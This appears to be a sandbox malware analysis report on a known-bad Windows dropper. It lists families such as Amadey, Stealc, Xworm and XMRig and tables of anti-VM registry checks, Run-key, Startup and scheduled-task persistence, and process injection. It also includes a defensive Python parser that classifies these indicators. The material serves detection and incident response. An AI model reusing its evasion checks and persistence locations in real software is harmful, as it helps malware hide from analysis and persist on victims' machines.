Analysis Overview
SHA256
dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c
Threat Level: Known bad
The file dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c was found to be: Known bad.
Malicious Activity Summary
Stealc family
Stealc
xmrig
LiteHTTP
Litehttp family
Healer family
Xmrig family
GCleaner
Xworm family
Amadey family
Detect Xworm Payload
Xworm
Gcleaner family
Healer
Detects Healer an antivirus disabler dropper
SystemBC
Systembc family
Amadey
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks BIOS information in registry
Identifies Wine through registry keys
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Drops startup file
.NET Reactor protector
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
AutoIT Executable
Enumerates processes with tasklist
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Kills process with taskkill
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2025-03-05 23:11
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 23:11
Reported
2025-03-05 23:14
Platform
win10v2004-20250217-en
Max time kernel
105s
Max time network
154s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\860be6c356.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107720101\\860be6c356.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\07d2efa8fe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107730101\\07d2efa8fe.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\840fb92a2b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\840fb92a2b.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4784 set thread context of 1032 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe |
| PID 1936 set thread context of 4236 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3380 set thread context of 4912 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 2644 set thread context of 4624 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
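The tables above carry the artifacts an analyst most wants out of this report: the `ACPI\DSDT\VBOX__` table name, the `SystemBiosVersion`/`VideoBiosVersion` strings and the `Software\Wine` key are classic sandbox fingerprints checked by the dropped binaries, while the Run values, Startup-folder files and `C:\Windows\Tasks\*.job` files are the persistence points to sweep on a suspected host, and the `set thread context` rows show which dropped executables inject into `BitLockerToGo.exe`. The following Python script is an added example, not part of the report or of the sandbox's own tooling: it parses rows in the `| Description | Indicator | Process | Target |` layout used on this page, classifies each row as anti-VM, persistence or injection, and groups the artifacts by the process that produced them. The sample rows are a subset copied from the tables above; the label names and the regular expressions are this example's own choices.

```python
import re
from collections import defaultdict
from pprint import pprint

# Signature rows in the report's "| Description | Indicator | Process | Target |"
# layout. These are copied from the tables above; the header row and an empty
# "N/A" row are included to show they are skipped.
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\250c1f6b4d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107710101\\250c1f6b4d.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe | N/A |
| PID 1936 set thread context of 4236 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
"""

COLUMNS = ("description", "indicator", "process", "target")

# Anti-analysis registry artifacts seen in the report, matched on the indicator.
# Label names are this example's own, not the sandbox's.
ANTI_ANALYSIS = (
    (re.compile(r"\\ACPI\\DSDT\\VBOX__$", re.I), "anti-vm:virtualbox-acpi"),
    (re.compile(r"\\System\\(?:System|Video)BiosVersion$", re.I), "anti-vm:bios-version"),
    (re.compile(r"\\Software\\Wine$", re.I), "anti-vm:wine"),
)
# Persistence and injection artifacts.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\[^=]+?\s*=\s*\"(.*)\"\s*$", re.I)
STARTUP = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
TASK_JOB = re.compile(r"^[A-Za-z]:\\Windows\\Tasks\\[^\\]+\.job$", re.I)
INJECT = re.compile(r"^PID \d+ set thread context of \d+$")


def parse_rows(text):
    """Turn the pipe-delimited signature rows into dicts, dropping header and empty rows."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != len(COLUMNS) or cells[0] == "Description":
            continue
        if all(c == "N/A" for c in cells):
            continue
        rows.append(dict(zip(COLUMNS, cells)))
    return rows


def classify(row):
    """Return (label, artifact) for a row, or (None, None) if it is not an IOC we track."""
    ind = row["indicator"]
    for pattern, label in ANTI_ANALYSIS:
        if pattern.search(ind):
            return label, ind
    m = RUN_KEY.search(ind)
    if m:
        # The report escapes backslashes inside the Run value data; undo that.
        return "persistence:run-key", m.group(1).replace("\\\\", "\\")
    if STARTUP.search(ind):
        return "persistence:startup-folder", ind
    if TASK_JOB.match(ind):
        return "persistence:tasks-job", ind
    if INJECT.match(row["description"]):
        return "injection:set-thread-context", row["target"]
    return None, None


def summarize(rows):
    """Group artifacts by the process that produced them: {process: {label: [artifacts]}}."""
    report = defaultdict(lambda: defaultdict(set))
    for row in rows:
        label, artifact = classify(row)
        if label is not None:
            report[row["process"]][label].add(artifact)
    return {proc: {lbl: sorted(arts) for lbl, arts in cats.items()}
            for proc, cats in report.items()}


if __name__ == "__main__":
    pprint(summarize(parse_rows(SAMPLE_ROWS)))
```

Fed the full tables from this page instead of the sample subset, the per-process summary shows at a glance that `rapes.exe` both fingerprints the VM and writes every Run value, which is what you would expect from the loader stage, and gives you the exact Run value data, Startup-folder paths and `.job` names to check on a host.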
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\rjbum\abfjdu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe | N/A |
